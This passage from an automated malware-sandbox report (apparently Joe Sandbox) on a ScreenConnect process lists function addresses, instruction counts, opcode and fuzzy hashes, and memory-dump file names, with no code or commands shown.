                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 569caf0f4f7bd21c173e1c6b682f41115fbffd1ed0aae83411e980d410e68329
                                                                                                                                                                                                                                                          • Instruction ID: 0bcb1e56b01a5b0214a9ab1e2b772110e7ad615c618e097c3214832d120b3cf1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 569caf0f4f7bd21c173e1c6b682f41115fbffd1ed0aae83411e980d410e68329
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB11C12190EBD84FE3A6CA3814610A57FE0FF86255F0806EFE4D9CB1E3CA196C05D341
                                                                                                                                                                                                                                                          Function 00007FF88826D37A Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 3525e7bcd5bdea4f2fd96704e85600c613c730b7f4d6b2edc02077c35b77d6c3
                                                                                                                                                                                                                                                          • Instruction ID: 90c7e0d31a8a5e93177c6f98aa79be338e03dcc934049040eb69cd53d128c1c4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3525e7bcd5bdea4f2fd96704e85600c613c730b7f4d6b2edc02077c35b77d6c3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F11D021F18D4A4FE698AE3890556B573E2FF98380B104279E01EC32CBDF28BC46C740
                                                                                                                                                                                                                                                          Function 00007FF888264C1D Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 62c398b14f1bd55d45ab3616e052260b697190c07ceecc2fa18554be0484829c
                                                                                                                                                                                                                                                          • Instruction ID: d313cfabece9390f840b0fb1b193c5700b741213a24bacfdf4890ee5f57d868f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62c398b14f1bd55d45ab3616e052260b697190c07ceecc2fa18554be0484829c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3411D6B1D4CA8C9FDB84DF6858651E83FE0FF55705F0500AAD498C3396DB20A501CB46
                                                                                                                                                                                                                                                          Function 00007FF88826E647 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: d7a03f1290b2bc34cdc06d45cb537684555a477da8d862d0066d433044ddc380
                                                                                                                                                                                                                                                          • Instruction ID: 19b018c81f09308a9d83948c4aa00b810f2ef85f2ac98c60a16511ae0ed330cf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7a03f1290b2bc34cdc06d45cb537684555a477da8d862d0066d433044ddc380
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E212774A058599FDBD4EB68D89DAA8B7F2FF28700F0401E5D40DD72A2CF34AD808B00
                                                                                                                                                                                                                                                          Function 00007FF88826AA65 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cd6a14e6a9db60d9a5a00efc97f0eb8a98da89e739ebce6d55f7ad011c636750
                                                                                                                                                                                                                                                          • Instruction ID: 562bf66627427a96770d39f855be10a098c0e4f384d71ce80599b257d4d4d393
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd6a14e6a9db60d9a5a00efc97f0eb8a98da89e739ebce6d55f7ad011c636750
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D11E572E1CB844BDB58DE1CA8022B977E1FB94760F0005AFE04F83296DE21A8058786
                                                                                                                                                                                                                                                          Function 00007FF888264139 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: e547e5673366816ca8ee5a4e0152b3e2e339c06f40d0b2608263605aaf0e8e22
                                                                                                                                                                                                                                                          • Instruction ID: aa47f9c78539dcd8f1e3c3e3929779ec0edb9e15eeabdb66a280941cb1d1ec57
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e547e5673366816ca8ee5a4e0152b3e2e339c06f40d0b2608263605aaf0e8e22
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0111A025D8CA474BF769922944A03B42BE2FF652C1F1981BAC089C61D6DF6CAC85C311
                                                                                                                                                                                                                                                          Function 00007FF888269570 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 16e8e842f623b0426326f0fc12b6bd82e2754f719aef452257015fafb2ec9f3c
                                                                                                                                                                                                                                                          • Instruction ID: edf46ccc8560b876d9b95a2ec52cbd26a14265023d86349e43fce5cf898a52e4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16e8e842f623b0426326f0fc12b6bd82e2754f719aef452257015fafb2ec9f3c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B101802194EBC84FD396D63808241A57FE0FB57211F1906EFE0D9C76E3CA5988059312
                                                                                                                                                                                                                                                          Function 00007FF88826236E Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 63143b26d427e86ee6d25eace30490d73b49e192286c44997aec1821c1f61369
                                                                                                                                                                                                                                                          • Instruction ID: 30a9fe172cfbcd18636a1bc3d69c0b79cab6e5e4b7439681316d5cab72417e3d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63143b26d427e86ee6d25eace30490d73b49e192286c44997aec1821c1f61369
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D113A31A08A4A8FDB88EF28C484BA577A1FF58344F1445B8C44DDB296DB29F846C785
                                                                                                                                                                                                                                                          Function 00007FF8882623D7 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 0f6fac3d7524f2e6953505849a1cc5a3ba46fba22d260c3fe7924504f23862ab
                                                                                                                                                                                                                                                          • Instruction ID: 6961f96ff64dbb07fa6074f865da551fc251745827e30e4af0d1fa49a9cb5ffc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f6fac3d7524f2e6953505849a1cc5a3ba46fba22d260c3fe7924504f23862ab
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47114931A08A4A8FDB88EF28C484BA577E1FF58344F0441B8C44DDB296CB39F846C784
                                                                                                                                                                                                                                                          Function 00007FF88826D439 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 9df69fc5d34b042b74a535489c602a7857e803f3e634b5b0c4739754f6cbd1c4
                                                                                                                                                                                                                                                          • Instruction ID: 0439f9829cbc3ad5ccdb1f2ef67625fe50f91bad9c39a3fad88897e50b7977d0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9df69fc5d34b042b74a535489c602a7857e803f3e634b5b0c4739754f6cbd1c4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB110252D5CDC60BE3A9FA2811116B527D0FF54694B0846BED08EC31CBDE1CB80AC348
                                                                                                                                                                                                                                                          Function 00007FF88826CA45 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 482cf79677d23616982308acfb59eb76bad285a0e3dafd608df75b9b28c1b1e4
                                                                                                                                                                                                                                                          • Instruction ID: 23996b6283aec191438834d6ed687e09c7ef5d2bcd69b4485efd266a16f15f51
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 482cf79677d23616982308acfb59eb76bad285a0e3dafd608df75b9b28c1b1e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA019E35A0D2C94FD712EB7488261E83F61BF82245F4944FAD45CCB193DF2DA819C712
                                                                                                                                                                                                                                                          Function 00007FF88826C957 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: cc9b1b4d7b35be9f7d6dad8af50e86016ecae02e3714b7a226b1a2b9c33205bb
                                                                                                                                                                                                                                                          • Instruction ID: 16e74f3f604799692392e4de3ce5788754921e7ddc6be06ff900bcbed5b8bee7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc9b1b4d7b35be9f7d6dad8af50e86016ecae02e3714b7a226b1a2b9c33205bb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5101573160DB02CBD35DEA28A0415BAB3E1FF85352F50087DE05A822C6CF3AF846CB49
                                                                                                                                                                                                                                                          Function 00007FF88826B51F Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: ce472549a2639d06dd1cfeaee44227e807a8690e8570bfedc2c3a2e6adea2ab0
                                                                                                                                                                                                                                                          • Instruction ID: b71c62cf1ea66ad3249a6cec5bb42f7f7c1ba576e49de58b5f9f6e98837726d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce472549a2639d06dd1cfeaee44227e807a8690e8570bfedc2c3a2e6adea2ab0
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4010075A18A4A8FDF84EF28C494AA533E1FFAD745B140568D41DC7286CB35E842CB41
                                                                                                                                                                                                                                                          Function 00007FF88826D59E Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 665fb661ce39a2a1e3c7fd91579c967a025ab232ae9224404a734d9f7a3af963
                                                                                                                                                                                                                                                          • Instruction ID: a5b348de3ca81a16f5e9480b15059ce00d162c6908461ee412709b518f1b1fa3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 665fb661ce39a2a1e3c7fd91579c967a025ab232ae9224404a734d9f7a3af963
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF0AF218486CD6FE702AB7498191F9BFF1EF85211F4801E6D848C6193DF256959C751
                                                                                                                                                                                                                                                          Function 00007FF88826E8F0 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 79bbd03f6284d800b39a9644a4c4c50c514c52fb22b01c8e05a68b4fb5ae1c06
                                                                                                                                                                                                                                                          • Instruction ID: db6f26e62edd6f9546c8121f24cddab3e7069f660481893982ccc365f739947f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79bbd03f6284d800b39a9644a4c4c50c514c52fb22b01c8e05a68b4fb5ae1c06
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18E09BB114D50C6EA61CAA55EC479F7379CF747134F00111FE18E82002F152B52382A5
                                                                                                                                                                                                                                                          Function 00007FF88826E752 Relevance: .0, Instructions: 33COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 651921d4a7cccc029fac5ba19085b7cb8ab17de41973d27ad3e3748c61c05c59
                                                                                                                                                                                                                                                          • Instruction ID: 5913bdfaf3bbc6ff753bb1d9722ec6af6cb6f5c31330495eeed9dc161d3369b9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 651921d4a7cccc029fac5ba19085b7cb8ab17de41973d27ad3e3748c61c05c59
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30F0F431E4491E8FEBA4EA189449BE8B3B1FB58352F1000B9D00DD3151CF396981CB00
                                                                                                                                                                                                                                                          Function 00007FF888263739 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 51ec6c69e0d91645be45767539598a5db9f0b11531d9690db4e6f5e575f8a80b
                                                                                                                                                                                                                                                          • Instruction ID: cf145bc405228a8e4e3149d440c991f72dea6864b536295aafca5cc3cc5abdbc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 51ec6c69e0d91645be45767539598a5db9f0b11531d9690db4e6f5e575f8a80b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEF0653584C68C9FCB46DB74D4918D57FB0FE16325B0501D7E049CB053D7219A59CB82
                                                                                                                                                                                                                                                          Function 00007FF888260521 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: f27159151fb810f9836516ff2bc4e015ce9c8b02d49182c4330c95e540c3f2f9
                                                                                                                                                                                                                                                          • Instruction ID: 2e907c0774cbe6a0b748ca54821b302d507ee04a564afa5bd1e8c08a7c90cee9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27159151fb810f9836516ff2bc4e015ce9c8b02d49182c4330c95e540c3f2f9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCE0DF6150E7C50FDB479B3898A88E03FA0EE1722170941EBD485CF0B3E6188A8AC752
                                                                                                                                                                                                                                                          Function 00007FF888264150 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: b3d0f0e01008be7da978a5514f169ef807f034c772ee14b3483b5b47503ffbe5
                                                                                                                                                                                                                                                          • Instruction ID: 1326f8a424d8acb173adf7014f8f57d3c647aa274eb454e2547fb8a307181333
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3d0f0e01008be7da978a5514f169ef807f034c772ee14b3483b5b47503ffbe5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08E0C2259DD90703FB6CA27678513F964D1BF05392F0A41BAE40DC00C5CF6CAD80C256
                                                                                                                                                                                                                                                          Function 00007FF88826E78C Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 1f52b9b7b85db2f29b9a219b687837408ab7e8a149c2a1b25003a8bc45156adb
                                                                                                                                                                                                                                                          • Instruction ID: 8666396536989b0dd2e6fab730e3d7a773d1ab0beeaf21d4f6a9d9f4c9e52a39
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f52b9b7b85db2f29b9a219b687837408ab7e8a149c2a1b25003a8bc45156adb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FE0B631A1451D8BDBA4EB68D8556ECB3A2FF89345F5001F5D11DD3152CF356D81CB41
                                                                                                                                                                                                                                                          Function 00007FF888269A73 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 83d14f371ef2b246dd42733781ef7a25214f1ece60e2f433e83932b1a3fa396b
                                                                                                                                                                                                                                                          • Instruction ID: f1fe65866df7ac896b682d772a19fe251bf922a74cbadebefda4a29f3d6b7df7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83d14f371ef2b246dd42733781ef7a25214f1ece60e2f433e83932b1a3fa396b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0D06C3571495D8F8B80EF4DE840ADA73A0FF99312B4104A1E52DC7215CA31E8258B40
                                                                                                                                                                                                                                                          Function 00007FF8882679A4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 94c5c996b72d4cf91658ee43eeaed1342087addb1d3ccb8b046ae61a8df9d71f
                                                                                                                                                                                                                                                          • Instruction ID: 774d54419ba2136d7417b4158ad3a1b3b5db9c6a2a7332c93b0c40da95516a52
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94c5c996b72d4cf91658ee43eeaed1342087addb1d3ccb8b046ae61a8df9d71f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7D01201F5C85E0BE594B36C74656FD42C1EF883E478A00F2D84CD625ADC0C1C8203C1
                                                                                                                                                                                                                                                          Function 00007FF888267992 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 7618f943560c1fb9217f99da580915120ded6686b5f91cbd80e74ddb09a95061
                                                                                                                                                                                                                                                          • Instruction ID: b9d0f667cb2703900b572b8c5399f0d57fab22d6790cff24ec9e039bbc2ad960
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7618f943560c1fb9217f99da580915120ded6686b5f91cbd80e74ddb09a95061
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C4C08C86F4D81B8BF1A0A10D3C410EC03C0FB847F2F881172D40CC524AEE0C288353C1
                                                                                                                                                                                                                                                          Function 00007FF88826D1C7 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1896506054.00007FF888260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF888260000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ff888260000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
